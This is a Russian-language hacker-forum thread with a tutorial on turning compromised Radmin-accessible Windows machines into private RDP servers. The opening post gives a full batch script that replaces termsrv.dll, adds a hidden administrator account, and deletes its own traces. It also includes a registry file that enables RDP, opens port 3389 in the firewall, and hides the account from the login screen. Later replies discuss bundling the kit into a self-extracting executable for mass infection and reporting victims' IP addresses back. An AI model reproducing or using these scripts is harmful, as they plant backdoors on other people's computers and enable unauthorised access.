PDA

Просмотр полной версии : Свой личный дедик через Радмин`а


CraftR14
11.03.2010, 13:40
Хочется вам оригинальный суперский не кем не тронутый, ну просто девственный дедик? * тада читаем статью!
Я часто лазию по радмин-серверам, и вот как то подумал а что если делать из них дедики?

И так начнем что нада? А нада учетку! Нада учетку такую чтоб она не палилась...
А еще нам нужен файлик termsrv.dll (но про него в конце)
и так создаем два файлика txt
1 файл назовем его run.txt
и пишем в него:
Скрытый текст требуется (5 сообщение(ий), сейчас у вас 97):
ren %SystemRoot%\system32\DLLCache\termsrv.dll termsrv.old
ren %SystemRoot%\system32\termsrv.dll termsrv.old
copy %SystemRoot%\temp\termsrv.dll %SystemRoot%\system32\DLLCache\termsrv.dll
copy %SystemRoot%\temp\termsrv.dll %SystemRoot%\system32\termsrv.dll
reg import key.reg
del %SystemRoot%\system32\DLLCache\termsrv.old
del %SystemRoot%\system32\termsrv.old
del %SystemRoot%\temp\termsrv.dll
del %SystemRoot%\temp\key.reg
net user sys 1234 /add /expires:never /times:all
net localgroup Администраторы sys /add
net localgroup Administrators sys /add
del %SystemRoot%\temp\run.cmd


Название учетки можете выбрать сами!
И меняем его формат, ну например .cmd......или bat кому как удобно
Зы я такую не использую! почему? потому что под это имя брутят__)))

а теперь второй файлик. Что б учетка не палилась нужно занести кое что в реестр...
и так назовем его key
И так
Скрытый текст требуется (5 сообщение(ий), сейчас у вас 97):
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l\Terminal Server\Licensing Core]
"EnableConcurrentSessions"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"AllowMultipleTSSessions"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Group Policy\History]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Group Policy\History\{35378EAC-683F-11D2-A89A-00C04FBBCFA2}]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Group Policy\History\{35378EAC-683F-11D2-A89A-00C04FBBCFA2}\0]
"Options"=dword:00000000
"Version"=dword:00010001
"DSPath"="LocalGPO"
"FileSysPath"="C:\\WINNT\\System32\\GroupPolic y\\M achine"
"DisplayName"="Политика локальной группы"
"Extensions"="[{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{0F6B957D-509E-11D1-A7CC-0000F87571E3}]"
"Link"="Local"
"GPOName"="Политика локальной группы"
"GPOLink"=dword:00000001
"lParam"=dword:00000000


[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Te rminal Server]
"fDenyTSConnections"=dword:00000000
"fEnableSalem"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\ LEGACY_RDPWD]
"NextInstance"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\ LEGACY_RDPWD\0000]
"Service"="RDPWD"
"Legacy"=dword:00000001
"ConfigFlags"=dword:00000000
"Class"="LegacyDriver"
"ClassGUID"="{8ECC055D-047F-11D1-A537-0000F8753ED1}"
"DeviceDesc"="RDPWD"

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\ LEGACY_RDPWD\0000\Control]
"*NewlyCreated*"=dword:00000000
"ActiveService"="RDPWD"



[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\ LEGACY_TDTCP]
"NextInstance"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\ LEGACY_TDTCP\0000]
"Service"="TDTCP"
"Legacy"=dword:00000001
"ConfigFlags"=dword:00000000
"Class"="LegacyDriver"
"ClassGUID"="{8ECC055D-047F-11D1-A537-0000F8753ED1}"
"DeviceDesc"="TDTCP"

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\ LEGACY_TDTCP\0000\Control]
"*NewlyCreated*"=dword:00000000
"ActiveService"="TDTCP"

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\R DPWD\Enum]
"0"="Root\\LEGACY_RDPWD\\0000"
"Count"=dword:00000001
"NextInstance"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\S haredAccess\Parameters\FirewallPolicy\DomainProfil e\GloballyOpenPorts\List]
"3389:TCP"="3389:TCP:*:Enabled:@xpsp2res.dll,-22009"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\S haredAccess\Parameters\FirewallPolicy\StandardProf ile\GloballyOpenPorts\List]
"3389:TCP"="3389:TCP:*:Enabled:@xpsp2res.dll,-22009"

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\T DTCP\Enum]
"0"="Root\\LEGACY_TDTCP\\0000"
"Count"=dword:00000001
"NextInstance"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l\Terminal Server]
"fDenyTSConnections"=dword:00000000
"fEnableSalem"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\R oot\LEGACY_RDPWD]
"NextInstance"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\R oot\LEGACY_RDPWD\0000]
"Service"="RDPWD"
"Legacy"=dword:00000001
"ConfigFlags"=dword:00000000
"Class"="LegacyDriver"
"ClassGUID"="{8ECC055D-047F-11D1-A537-0000F8753ED1}"
"DeviceDesc"="RDPWD"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\R oot\LEGACY_RDPWD\0000\Control]
"*NewlyCreated*"=dword:00000000
"ActiveService"="RDPWD"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\R oot\LEGACY_TDTCP]
"NextInstance"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\R oot\LEGACY_TDTCP\0000]
"Service"="TDTCP"
"Legacy"=dword:00000001
"ConfigFlags"=dword:00000000
"Class"="LegacyDriver"
"ClassGUID"="{8ECC055D-047F-11D1-A537-0000F8753ED1}"
"DeviceDesc"="TDTCP"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\R oot\LEGACY_TDTCP\0000\Control]
"*NewlyCreated*"=dword:00000000
"ActiveService"="TDTCP"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\RDPWD\Enum]
"0"="Root\\LEGACY_RDPWD\\0000"
"Count"=dword:00000001
"NextInstance"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\SharedAccess\Parameters\FirewallPolicy\DomainPr ofile\GloballyOpenPorts\List]
"3389:TCP"="3389:TCP:*:Enabled:@xpsp2res.dll,-22009"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\SharedAccess\Parameters\FirewallPolicy\Standard Profile\GloballyOpenPorts\List]
"3389:TCP"="3389:TCP:*:Enabled:@xpsp2res.dll,-22009"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\TDTCP\Enum]
"0"="Root\\LEGACY_TDTCP\\0000"
"Count"=dword:00000001
"NextInstance"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t]
"sys"=dword:00000000


Не забудьте имя поменять!



И сохраняем файлик в формат reg
Ну и все остался только тот самый tervsrv.dll

И вам остается только запустить на тачке run.cmd
Качаем: ЖМЯК ([Ссылки доступны только зарегистрированным пользователям])

vint10
18.03.2010, 20:00
хотелось бы увидеть мнения знающих)

rebbe
22.03.2010, 19:52
извините а без радмина это можно сделать?
например все это собрать в один ехе и на загрузки ставить cj

rebbe
22.03.2010, 20:04
[Ссылки доступны только зарегистрированным пользователям]

CraftR14
22.03.2010, 23:08
извините а без радмина это можно сделать?
например все это собрать в один ехе и на загрузки ставить cj

WinRar слышал о таком?? )))

и к чему ты эту ссыль дал? чо думаеш я копипастю?? :o*ploho*

rebbe
24.03.2010, 10:31
WinRar слышал о таком?? )))

и к чему ты эту ссыль дал? чо думаеш я копипастю?? :o*ploho*

ну ты блин евгений петросян,ты вот сам попробуй это на загрузки поставить с винраром и посмотрим на твои успехи :D,а во вторых я имел что велосипед а не копипаст

CraftR14
24.03.2010, 10:46
попробуй это на загрузки поставить
Я по-японски не понимаю извини.......... скажи нормально
Если ты о SFX архиве который не спрашивает распаковвыватся ему или нет, тык там делать то нечего))

rebbe
24.03.2010, 20:54
а что тут по японски,я же говорю возьми и прогрузи,как потом залогинешься к нему???
для этого как минимум нужно знать ип его,и не помешало бы еще знать в сети ли он

Craft_R14
25.03.2010, 13:28
а что тут по японски,я же говорю возьми и прогрузи,как потом залогинешься к нему???
для этого как минимум нужно знать ип его,и не помешало бы еще знать в сети ли он

Пароль стандартный 12345678 или 123456789 насчет ип адреса а вдруг у него статика? )) а если динамика то тут может помоч скрипт.vbs ))))

rebbe
26.03.2010, 10:54
да дело в том что если ты грузишь чкерез трафф то никак неузнаешь стата там или выделенка,поэтому вопрос и стоит в том чтобы проверял на ipconfig и отправлял его ип на стату где пишется айпишник

war
09.04.2010, 23:00
чета так и не понял а версия радмина какая?